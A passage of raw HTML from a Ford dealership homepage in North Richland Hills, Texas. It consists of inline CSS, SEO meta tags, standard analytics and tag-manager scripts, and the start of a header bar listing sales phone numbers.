.hide-atf{position:relative;visibility:hidden}.RQukm{height:100%;position:relative}.fVCADe{position:absolute;z-index:69;margin-left:auto;margin-right:auto;left:0;right:0;top:50%;-webkit-transform:translateY(-50%);-ms-transform:translateY(-50%);transform:translateY(-50%);width:100%;height:100%}.hHwUnz{position:absolute;z-index:59;margin-left:auto;margin-right:auto;left:0;right:0;top:50%;-webkit-transform:translateY(-50%);-ms-transform:translateY(-50%);transform:translateY(-50%);width:100%;height:100%}.dugcuu{position:absolute;z-index:49;margin-left:auto;margin-right:auto;left:0;right:0;top:50%;-webkit-transform:translateY(-50%);-ms-transform:translateY(-50%);transform:translateY(-50%);width:100%;height:100%}.qJoNk{position:absolute;z-index:39;margin-left:auto;margin-right:auto;left:0;right:0;top:50%;-webkit-transform:translateY(-50%);-ms-transform:translateY(-50%);transform:translateY(-50%);width:100%;height:100%}.dKDxog{position:absolute;z-index:29;margin-left:auto;margin-right:auto;left:0;right:0;top:50%;-webkit-transform:translateY(-50%);-ms-transform:translateY(-50%);transform:translateY(-50%);width:100%;height:100%}.bPmYGi{position:absolute;z-index:19;margin-left:auto;margin-right:auto;left:0;right:0;top:50%;-webkit-transform:translateY(-50%);-ms-transform:translateY(-50%);transform:translateY(-50%);width:100%;height:100%}.dsfGqY{height:100%;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center}.dsfGqY .image__desktop-view,.dsfGqY .image__mobile-view,.dsfGqY .image__tablet-view{display:none}.dsfGqY .image__mobile-view{display:block}@media (min-width:1024px){.dsfGqY .image__mobile-view{display:none}.dsfGqY .image__tablet-view{display:none}.dsfGqY .image__desktop-view{display:block}}.hXfFQc{width:100%;height:100%}.irKvMx{position:relative;overflow:hidden}@media (max-width:767px){.irKvMx{height:200px}}@media (min-width:768px) and (max-width:1023px){.irKvMx{height:300px}}@media (min-width:1024px){.irKvMx{height:540px}}.irKvMx .slick-slide{position:relative;overflow:hidden}.irKvMx .slick-arrow{display:none!important;z-index:800;cursor:pointer;position:absolute;box-sizing:border-box;top:50%;height:34px;width:34px;border-radius:2px;opacity:1;pointer-events:all;background-color:rgba(0,0,0,.5);background-position:50% 50%;background-repeat:no-repeat;-webkit-transform:translateY(-50%);-webkit-transform:translateY(-50%);-ms-transform:translateY(-50%);transform:translateY(-50%);-webkit-transition:all .5s;-o-transition:all .5s;-webkit-transition:all .5s;transition:all .5s}.irKvMx .slick-arrow:before{content:''}@media (min-width:1024px){.irKvMx .slick-arrow{display:block!important}}.irKvMx .slick-prev{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' width='18' height='18' fill='%23fff'%3E%3Cpath d='M15 8.25H5.87l4.19-4.19L9 3 3 9l6 6 1.06-1.06-4.19-4.19H15v-1.5z'/%3E%3C/svg%3E");background-size:18px 18px;left:16px}.irKvMx .slick-prev:hover{background-color:rgba(0,0,0,.75)}.irKvMx .slick-next{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' width='18' height='18' fill='%23fff'%3E%3Cpath d='M9 3L7.94 4.06l4.19 4.19H3v1.5h9.13l-4.19 4.19L9 15l6-6z'/%3E%3C/svg%3E");background-size:18px 18px;right:16px}.irKvMx .slick-next:hover{background-color:rgba(0,0,0,.75)}.irKvMx .slick-list,.irKvMx .slick-track{height:100%;position:relative}.irKvMx .slick-dotted.slick-slider{margin-bottom:30px}.irKvMx .slick-dots{position:absolute;bottom:5px;z-index:800;display:block}.irKvMx .slick-dots li button:focus,.irKvMx .slick-dots li button:hover{outline:0}.irKvMx .slick-dots li button:focus:before,.irKvMx .slick-dots li button:hover:before{opacity:1}.irKvMx .slick-dots li button:before{border:5px solid #000;border-radius:50%;content:' ';opacity:.25}.irKvMx .slick-dots li.slick-active button:before{opacity:.75}.lddcBl{height:100%;position:relative}.kCVBLn{color:#000;min-height:100%;width:100%;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column}</style><style data-jro-atf-css>.rocket-contain img,.rocket-contain video,.rocket-contain-self{object-fit:contain;object-position:center center}.rocket-cover img,.rocket-cover video,.rocket-cover-self{object-fit:cover;object-position:center center}.rocket-contain img,.rocket-contain video,.rocket-contain-self{font-family:'object-fit:contain;object-position:center center;'!important}.rocket-cover img,.rocket-cover video,.rocket-cover-self{font-family:'object-fit:cover;object-position:center center;'!important}.atf-loading .hide-atf{position:relative;visibility:hidden}.kERLEx{background:rgba(1,18,56,.7);border-bottom:2px solid #011238}.ekbcyF{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;padding:0;max-width:1272px;margin:0 auto}.ekbcyF .tab-custom1,.ekbcyF .tab-used_vehicles{display:block}.ekbcyF .tab-price_range,.ekbcyF .tab-vehicle_type{display:none}@media (min-width:1024px){.ekbcyF .tab-custom1,.ekbcyF .tab-price_range,.ekbcyF .tab-used_vehicles,.ekbcyF .tab-vehicle_type{display:block}}.VKwuj{height:100%;outline:0;cursor:pointer;line-height:46px;text-align:center;color:#9e9e9e;text-transform:uppercase;font-size:16px}.fiYpi{-webkit-flex:1;-ms-flex:1;flex:1;height:48px;box-sizing:border-box}.fiYpi.active{background:#011238}.fiYpi.active>.sc-gacfCG{color:#fff;border-bottom:5px solid #011238}@media (min-width:1024px){.fiYpi{border-right:1px solid #011238}.fiYpi:last-child{border-right:none}}.fiYpi:hover:not(.active){background:rgba(0,0,0,0)}.kTadoe{-webkit-text-decoration:none;text-decoration:none;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;padding:10px;-webkit-box-flex:0;-webkit-flex-grow:0;-ms-flex-positive:0;flex-grow:0;-webkit-flex-shrink:0;-ms-flex-negative:0;flex-shrink:0;font-size:16px;text-align:center;line-height:1;height:auto;border-radius:2px;outline:0;color:#9e9e9e;background:#f5f5f5;cursor:pointer}.kTadoe:active,.kTadoe:focus,.kTadoe:hover{outline:0;color:#000;background-color:#fff}.fUlKob{padding:6px 4px;position:relative}.dNpUjv{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-wrap:wrap;-ms-flex-wrap:wrap;flex-wrap:wrap}.dNpUjv .sc-yZwTr{height:100%;-webkit-flex:1 1 auto;-ms-flex:1 1 auto;flex:1 1 auto;min-width:100px;white-space:nowrap}.kqVJpg{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-wrap:wrap;-ms-flex-wrap:wrap;flex-wrap:wrap}.kqVJpg .sc-yZwTr{height:100%;width:calc(100% / 3)}.gsMIaE{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-wrap:wrap;-ms-flex-wrap:wrap;flex-wrap:wrap}.gsMIaE .sc-yZwTr{height:100%;width:calc(100% / 5)}.jTvCyr{margin:0 auto;position:relative;width:80px;height:40px;overflow:hidden}.czhwq{position:absolute;width:80px;height:80px;bottom:0}.bhpcOA{text-align:center;font-size:12px}.kPeqfK{outline:0;cursor:pointer;-webkit-text-decoration:none;text-decoration:none;display:block;background-color:#f5f5f5;border-radius:2px}.kPeqfK .sc-lnmtFM svg{fill:#9e9e9e}.kPeqfK .sc-FQuPU{color:#9e9e9e}.kPeqfK:active,.kPeqfK:focus,.kPeqfK:hover{outline:0;background-color:#fff}.kPeqfK:active .sc-lnmtFM svg,.kPeqfK:focus .sc-lnmtFM svg,.kPeqfK:hover .sc-lnmtFM svg{fill:#000}.kPeqfK:active .sc-FQuPU,.kPeqfK:focus .sc-FQuPU,.kPeqfK:hover .sc-FQuPU{color:#000}.dhWUKf>div{-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center}.kgqeXA{position:absolute;overflow:hidden;height:1;width:1}.eHUZJx{padding:10px}.bfVDLi{background:#011238}.jPXHzd{min-height:130px;max-width:1272px;margin:0 auto;padding:20px 15px 0}@media (min-width:768px){.jPXHzd{padding:0 15px}}.jPXHzd.standard-tab{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center}@media (min-width:1024px){.jPXHzd.standard-tab{-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row}}.gzDfhW{width:100%;padding:0 5px}.gzDfhW .tab-custom1,.gzDfhW .tab-price_range,.gzDfhW .tab-used_vehicles,.gzDfhW .tab-vehicle_type{display:none}.gzDfhW.active-tab-custom1 .tab-custom1,.gzDfhW.active-tab-price_range .tab-price_range,.gzDfhW.active-tab-used_vehicles .tab-used_vehicles,.gzDfhW.active-tab-vehicle_type .tab-vehicle_type{display:block}.lgoSIa{min-height:100%;width:100%;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;margin:auto}</style><style data-jro-atf-css>.rocket-contain img,.rocket-contain video,.rocket-contain-self{object-fit:contain;object-position:center center}.rocket-cover img,.rocket-cover video,.rocket-cover-self{object-fit:cover;object-position:center center}.rocket-contain img,.rocket-contain video,.rocket-contain-self{font-family:'object-fit:contain;object-position:center center;'!important}.rocket-cover img,.rocket-cover video,.rocket-cover-self{font-family:'object-fit:cover;object-position:center center;'!important}.atf-loading .hide-atf{position:relative;visibility:hidden}.hQpEJA img[data-error=true]{background-color:#eee}.hXToPs{margin:0;font-size:14px;padding:0 10px}.hXToPs:hover{background-color:rgba(0,0,0,0)}.SPDPo{display:block;-webkit-text-decoration:none;text-decoration:none}.bsttxx{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row;-webkit-flex-wrap:wrap;-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center}.bsttxx .sc-kOnlKp{width:calc(100% / 2);overflow:hidden}@media (min-width:768px){.bsttxx .sc-kOnlKp{width:calc(100% / 6)}}@media (min-width:1024px){.bsttxx .sc-kOnlKp{width:calc(100% / 8)}}.jJLJmm{text-align:center;color:#fff;font-weight:400;margin-top:-12px;text-overflow:ellipsis;white-space:nowrap;overflow:hidden}.gIZPUr{color:#000;background-color:transparent;min-height:100%;width:100%;max-width:1272px;margin:auto}.iQJPhO{margin:0;text-align:center;font-weight:400;font-size:1.5rem;line-height:1}@media (min-width:768px){.iQJPhO{font-size:3rem;line-height:118px}}@media (min-width:1024px){.iQJPhO{font-size:3.5rem;line-height:104px}}</style><style data-jro-atf-css>.rocket-contain img,.rocket-contain video,.rocket-contain-self{object-fit:contain;object-position:center center}.rocket-cover img,.rocket-cover video,.rocket-cover-self{object-fit:cover;object-position:center center}.rocket-contain img,.rocket-contain video,.rocket-contain-self{font-family:'object-fit:contain;object-position:center center;'!important}.rocket-cover img,.rocket-cover video,.rocket-cover-self{font-family:'object-fit:cover;object-position:center center;'!important}.atf-loading .hide-atf{position:relative;visibility:hidden}.kJwvhg{font-size:14px;display:block;text-align:left}.eaHcMC{margin-top:5px;font-size:16px;width:100%}.eaHcMC,.eaHcMC[type=color],.eaHcMC[type=date],.eaHcMC[type=datetime-local],.eaHcMC[type=datetime],.eaHcMC[type=email],.eaHcMC[type=month],.eaHcMC[type=number],.eaHcMC[type=password],.eaHcMC[type=phone],.eaHcMC[type=range],.eaHcMC[type=search],.eaHcMC[type=tel],.eaHcMC[type=text],.eaHcMC[type=time],.eaHcMC[type=url],.eaHcMC[type=week]{color:#000;background-color:rgba(0,0,0,0);box-shadow:none;border:none;border-bottom:solid 2px #000;border-radius:0;padding:5px 4px}.eaHcMC:focus{color:#000;background-color:rgba(0,0,0,0);border-bottom:solid 2px props => (0,_themeUtilities.applyThemeColor) (props.theme,expr)}.eaHcMC::-webkit-input-placeholder{color:#f5f5f5}.eaHcMC::-moz-placeholder{color:#f5f5f5}.eaHcMC:-ms-input-placeholder{color:#f5f5f5}.eaHcMC::placeholder{color:#f5f5f5}.fGoTtG{font-size:16px;resize:none;width:100%;height:15em}.fGoTtG,.fGoTtG[type=color],.fGoTtG[type=date],.fGoTtG[type=datetime-local],.fGoTtG[type=datetime],.fGoTtG[type=email],.fGoTtG[type=month],.fGoTtG[type=number],.fGoTtG[type=password],.fGoTtG[type=phone],.fGoTtG[type=range],.fGoTtG[type=search],.fGoTtG[type=tel],.fGoTtG[type=text],.fGoTtG[type=time],.fGoTtG[type=url],.fGoTtG[type=week]{color:#000;background-color:rgba(0,0,0,0);box-shadow:none;border:none;border-bottom:solid 2px #000;border-radius:0;padding:5px 4px}.fGoTtG:focus{color:#000;background-color:rgba(0,0,0,0);border-bottom:solid 2px props => (0,_themeUtilities.applyThemeColor) (props.theme,expr)}.fGoTtG::-webkit-input-placeholder{color:#f5f5f5}.fGoTtG::-moz-placeholder{color:#f5f5f5}.fGoTtG:-ms-input-placeholder{color:#f5f5f5}.fGoTtG::placeholder{color:#f5f5f5}.pTaln{color:#f44336;margin-left:5px}.hPYrb{display:block;margin:0 auto;text-align:left;font-size:14px}.fPhJrO{text-align:left;font-size:12px;width:100%;padding-right:1em;margin-bottom:30px}@media (min-width:768px){.fPhJrO{font-size:18px;width:25%}}@media (min-width:1024px){.fPhJrO{font-size:14px}}.eMYXFu{text-align:left;font-size:12px;width:100%;padding-right:1em;margin-bottom:30px}@media (min-width:768px){.eMYXFu{font-size:18px;width:100%}}@media (min-width:1024px){.eMYXFu{font-size:14px}}.cdUdqJ{display:none}.chmeXf{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row;-webkit-flex-wrap:wrap;-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-box-pack:start;-webkit-justify-content:flex-start;-ms-flex-pack:start;justify-content:flex-start;margin-right:-1em}.cOwyZT{margin-top:30px}@media (min-width:768px){.cOwyZT{margin-top:50px}}.cOwyZT input:focus,.cOwyZT select:focus,.cOwyZT textarea:focus{outline-offset:0;outline:0}.cOwyZT:-moz-placeholder,.cOwyZT:-ms-input-placeholder,.cOwyZT::-moz-placeholder,.cOwyZT::-webkit-input-placeholder,.cOwyZT:placeholder-shown{color:#f5f5f5}.jYnKfE{margin:0 auto;width:100%}.jYnKfE .gform_validation_container{display:none;position:absolute;left:-9000px}.kuOiUi{margin-top:25px;width:150px;height:38px;cursor:pointer}@media (min-width:768px){.kuOiUi{margin-top:60px;width:230px;height:48px}}.kuOiUi[type=submit]{color:#fff;background-color:#000;border-width:1px;border-style:solid;border-color:transparent;font-size:18px;padding:.6em 1em .6em}input.kuOiUi,input.kuOiUi:active,input.kuOiUi:focus,input.kuOiUi:hover{color:#fff;background-color:#000;border-color:transparent}.amp-form-submitting .kuOiUi,.amp-form-submitting .kuOiUi:hover{border:solid 1px #f5f5f5;color:#f5f5f5;background-color:transparent;cursor:default}.amp-form-submit-success .kuOiUi{display:none}.koyOOs{font-size:18px;margin:1em 0;padding:1em;border:solid 1px #8bc34a;color:#8bc34a;background-color:transparent}.gbqJJl{font-size:18px;padding:1em;border:solid 1px #f44336;color:#f44336;background-color:transparent}.jDJubj{text-align:center}.klLzjI{position:relative;padding-top:45px;padding-bottom:100px;width:100%}.jwuqqb{text-align:center;font-size:16px;font-weight:400;text-transform:none}.cqzkie{font-size:30px;text-align:center;text-transform:uppercase;margin-bottom:20px}.ceLztV{margin:24px 0 16px;padding:0;text-align:center;font-size:13px;color:#757575}.ceLztV a{color:#039be5;outline:0;-webkit-text-decoration:none;text-decoration:none}.hiSVkK{color:#000;background-color:rgba(0,0,0,0);min-height:100%;width:100%;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;max-width:1272px;margin:auto;padding:0 30px}</style><title>Five Star Ford: New &amp; Used Ford Dealership North Richland Hills, Dallas, Fort Worth, DFW, TX</title><!-- This site is optimized with the Yoast SEO plugin v5.4.2 - https://yoast.com/wordpress/plugins/seo/ --><meta name="description" content="If you want to receive award-winning service from a tenured staff of automotive professionals, shop at Five Star Ford of North Richland Hills. Our nearby Ford dealership offers cash rebates, financing incentives and car lease deals in Dallas, Fort Worth, TX."/><link rel="canonical" href="https://www.5starford.com/" /><meta property="og:locale" content="en_US" /><meta property="og:type" content="website" /><meta property="og:title" content="Five Star Ford: New &amp; Used Ford Dealership North Richland Hills, Dallas, Fort Worth, DFW, TX" /><meta property="og:description" content="If you want to receive award-winning service from a tenured staff of automotive professionals, shop at Five Star Ford of North Richland Hills. Our nearby Ford dealership offers cash rebates, financing incentives and car lease deals in Dallas, Fort Worth, TX." /><meta property="og:url" content="https://www.5starford.com/" /><meta property="og:site_name" content="5 Star Ford North Richland Hills" /><meta property="og:image" content="https://images-stag.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/2018-UNITED-STATES-SHIELD_gopt.png" /><meta property="og:image:secure_url" content="https://images-stag.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/2018-UNITED-STATES-SHIELD_gopt.png" /><meta property="og:image" content="https://images-stag.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/AwardLineup_gopt.png" /><meta property="og:image:secure_url" content="https://images-stag.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/AwardLineup_gopt.png" /><meta name="twitter:card" content="summary" /><meta name="twitter:description" content="If you want to receive award-winning service from a tenured staff of automotive professionals, shop at Five Star Ford of North Richland Hills. Our nearby Ford dealership offers cash rebates, financing incentives and car lease deals in Dallas, Fort Worth, TX." /><meta name="twitter:title" content="Five Star Ford: New &amp; Used Ford Dealership North Richland Hills, Dallas, Fort Worth, DFW, TX" /><meta name="twitter:image" content="https://images-stag.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/2018-UNITED-STATES-SHIELD_gopt.png" /><script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"WebSite","@id":"#website","url":"https:\/\/www.5starford.com\/","name":"5 Star Ford North Richland Hills","potentialAction":{"@type":"SearchAction","target":"https:\/\/www.5starford.com\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script><meta name="google-site-verification" content="r_Cg8IvcohbroENkg012i9HJuSOZLWV7A2RXwWAPSGI" /><!-- / Yoast SEO plugin. --> <script type="text/javascript"> (function() { window.jzla5p = { accountId: "0", publicEndpointBase: "//auto5-srp.jazelc.com/6.5.0/rel", searchEndpointBase: "//search-a5-jazel-tango.jazel-qa.com/api/", mediaEndpointBase: "//media-a5-jazel-tango.jazel-qa.com/" }; var combineUrl = function (url1, url2) { url1 = url1 || ""; url2 = url2 || ""; var url1ToCombine = url1.charAt(url1.length - 1) === "/" ? url1.substring(0, url1.length - 1) : url1; var url2ToCombine = url2.charAt(0) === "/" ? url2.substring(1) : url2; return url1ToCombine + "/" + url2ToCombine; }; window._auto5ProductsStatic = combineUrl(window.jzla5p.publicEndpointBase, "/static/"); })(); </script> <link rel='dns-prefetch' href='//rocket-prod.jazelc.com' /><link rel='dns-prefetch' href='//cdnjs.cloudflare.com' /><link rel='dns-prefetch' href='//www.google.com' /><link rel='dns-prefetch' href='//s.w.org' /> <script> console.log("Jazel Analytics", JSON.stringify({"page_title":"Five Star Ford","ua_group":"desktop","country":"USA","load_page_type":"page","load_page_sub_type":"home"})); </script> <script> window.digitaldata = {"page":{"pageName":"dc:home","siteSection":"home","hierarchy":"home","userLanguage":"eng","pageNameNoVehicle":"dc:home","client":"ford","site":"dc:jazel:us","radUIVersion":"ui:rad:pc","variantName":"home-load"},"user":{"paCode":"02486","fordRegion":"North Texas","fdafCode":"52C"}}; (function() { var radUiType; var testWidth = window.innerWidth||document.documentElement.clientWidth||document.body.clientWidth; if (testWidth > 0) { if (testWidth < 768) { radUiType = 'mobile'; } else if (testWidth < 992) { radUiType = 'tablet'; } else { radUiType = 'pc'; } window.digitaldata.page.radUIVersion = window.radUIVersion = 'ui:rad:' + radUiType; } })(); window.dtmPageLoadActionLabel = "row14(PL)(2)"; window.jazel = window.jazel || {}; window.jazel.fdPaCode = "02486"; </script> <link rel='stylesheet' id='slick-carousel-css' href='//cdnjs.cloudflare.com/ajax/libs/slick-carousel/1.9.0/slick.min.css?ver=1.9.0' type='text/css' media='all' /><link rel='stylesheet' id='slick-carousel-theme-css' href='//cdnjs.cloudflare.com/ajax/libs/slick-carousel/1.9.0/slick-theme.min.css?ver=1.9.0' type='text/css' media='all' /><link rel='stylesheet' id='jazelbase-style-css' href='/content/themes/jazelbase/style.min.css?ver=20190328-2300' type='text/css' media='all' /><link rel='stylesheet' id='js_composer_front-css' href='/content/plugins/js_composer/assets/css/js_composer.min.css?ver=5.2.1' type='text/css' media='all' /><script type='text/javascript' src='https://rocket-prod.jazelc.com:29620/js-polyfill?ver=1.0.0'></script> <script> window.jzaq = window.jzaq || []; window.jzaq.push(["_setDebug"]); </script> <script>window.jzlBindConfig = { interactionDelayMsecs: 10000, postponeCalculations: false, analyticsListener: function(action, payload) { window.jzaq = window.jzaq || []; window.jzaq.push([action, payload]); }, };</script> <script src="//assets.adobedtm.com/a07333cf048521a77d8805932555ede8eefdb471/satelliteLib-d3d178e0dc1f9f11ca4dd6ed434af58fff94986a.js" ></script> <script src="//s.btstatic.com/tag.js#site=0b20dJp&mode=sync" type="text/javascript" ></script> <!-- AutoAlert Signals --><script type="text/javascript">var _msq=_msq||[];_msq.push(['_setWebsite',''],['_trackPageview']);(function(){var mSignal=document.createElement('script');mSignal.type='text/javascript';mSignal.async=!0;mSignal.src=('https:'==document.location.protocol?'https://':'http://')+'fzlnk.com/signals.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(mSignal,s)})();</script><noscript><img src="http://fzlnk.com/HandleSignal.ashx?s_type=trackPageview&s_wsId=&smc= &cachebuster=1407826664" height="1" width="1" style="display:none"></noscript> <link rel="pingback" href="https://www.5starford.com/wp/xmlrpc.php"> <link rel="icon" type="image/x-icon" href="https://images-stag.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/favicon.png"/> <!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="/content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><meta name="amp-link-variable-allowed-origin" content="https://userlogin.jazelc.com"/><meta name="amp-link-variable-allowed-origin" content="https://userlogin.jazelc.com"/> <script>jazelReady(function() { (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-WVQV85M'); });</script> <script>jazelReady(function() { (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-M8KTNS'); });</script> <script>jazelReady(function() { (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-PRQ9QQC'); });</script> <script>jazelReady(function() { (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-P34BXHZ'); });</script> <script>jazelReady(function() { (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-NZ2687S'); });</script> <script>jazelReady(function() { (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-WLQNJ7J'); });</script> <script></script><meta name="google-site-verification" content="A2nMKP-1hWnwbjwORHh2K4hQ5GQd-wa1PzkJVuaWK2U" /><meta name="google-site-verification" content="gFV6wzn7VHk9v7hJP-JX_WgxNTdYHJqjLB_YooH4q5Y" /><meta name="google-site-verification" content="QSZERum4M3Bacg22WJhcdD-UQSE7GHRgwOmBU-DNBEc" /><meta name="msvalidate.01" content="174555F4676A7DC6F075ACE9A8A82F21" /><script></script> <script>jazelReady(function() { (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-WVZ69W8'); });</script> <script></script><script type = "text/javascript">var session_id;localStorage.getItem("session_id")&&window.document.referrer&&window.document.referrer.split("/")[2]===location.hostname?session_id=localStorage.getItem("session_id"):(session_id=Math.floor(1e6*Math.random()+1)+Math.round((new Date).getTime()),localStorage.setItem("session_id",session_id));var timeoutValue=18e5;function eventListener(e,t){document.addEventListener(e,function(){window.clearTimeout(t),t=setTimeout(function(){},timeoutValue)})}var timer=setTimeout(function(){localStorage.removeItem("session_id")},timeoutValue);eventListener("mousedown",timer),eventListener("scroll",timer);var utm_src="unk",utm_mdm="unk",acb=Math.round((new Date).getTime()),title=window.document.title,url=window.location.href,cust="5starfordrichlandhills-623",prd="web";function d(e){return-1!=e.indexOf("%3D")?d(decodeURIComponent(e)):e}function set_param(e,t,s){var n=e[0];n+="&"+(t=encodeURI(t))+"="+(s=encodeURI(s)),e[0]=n}(url=d(url)).indexOf("utm_source=")>-1&&(utm_src=url.substr(url.indexOf("utm_source=")+"utm_source".length+1).split("&")[0]),url.indexOf("utm_medium=")>-1&&(utm_mdm=url.substr(url.indexOf("utm_medium=")+"utm_medium".length+1).split("&")[0]);var pixel_src="https://tn.alphonso.tv/ad/ord="+acb+"?prd="+prd+"&cust="+cust+"&utm_source="+utm_src+"&utm_mdm="+utm_mdm+"&url="+encodeURIComponent(url)+"&title="+encodeURIComponent(title)+"&sess_status=st&sess="+session_id;set_param(pixel_src=[pixel_src],"event_type","visit"),(new Image).src=pixel_src[0],window.onbeforeunload=function(){acb=Math.round((new Date).getTime()),(new Image).src="https://tn.alphonso.tv/ad/ord="+acb+"?prd="+prd+"&cust="+cust+"&sess_status=en&sess="+session_id};</script><script></script> <noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript><script>(function() { var scripts = ["https://cdnjs.cloudflare.com/ajax/libs/mustache.js/3.0.1/mustache.min.js?ver=3.0.1","/content/plugins/jzl-util/jzl-bind/js/jzl-bind.min.js?ver=20190507-0300"]; scripts.forEach(function(src) { var script = document.createElement('script'); script.src = src; script.async = false; document.head.appendChild(script); }); })();</script></head><body class="home page-template-default page page-id-2 no-sidebar wpb-js-composer js-comp-ver-5.2.1 vc_responsive"><div id="page" class="site rocket_bars_wrapper slides_with_siderail" data-jzlbind-class=" (h('bars.activeBars').map(function(x) { return x() }).filter(function(x) { return x != null; }).join(' ')) + ' ' + (h('sideRailState.open') ? 'site rocket_bars_wrapper slides_with_siderail siderail_open' : 'site rocket_bars_wrapper slides_with_siderail') " > <div id="rocket-ux-bars" class="sc-bhlBdH hKLAcX"><div class="sc-dYzWWc kowUgC sc-gMcBNU fgfzKz" data-jzlbind-class="'sc-dYzWWc kowUgC ' + (&quot;empty&quot;)" sizes="desktop,desktopLg"><div height="25px" width="100%" color="!desktopBarTextColor" id="desktop-action-bar" class="sc-AnqlK sc-iLVFha hTlVBe"><div height="100%" width="100%" font-size="10px" class="sc-AnqlK sc-iLVFha ksMMnC"><div class="sc-AnqlK sc-kkwfeq jmTZTf"><div class="sc-AnqlK sc-iBmynh sc-hycgNl iBzoRC"><a class="sc-dTLGrV static-anchor undefined sc-ivVeuv kcrZik" href="tel:+1(817) 500-0096"><div class="sc-dRCTWM sc-cgHJcJ dLLOIG"><div class="sc-AnqlK sc-iBmynh sc-cCbXAZ static-text sc-fHSTwm gGrDQo">Sales: (817) 500-0096</div></div></a></div><div class="sc-AnqlK sc-iBmynh sc-hycgNl iBzoRC"><a class="sc-dTLGrV static-anchor undefined sc-ivVeuv kcrZik" href="tel:+1(817) 500-0097"><div class="sc-dRCTWM sc-cgHJcJ dLLOIG"><div class="sc-AnqlK sc-iBmynh 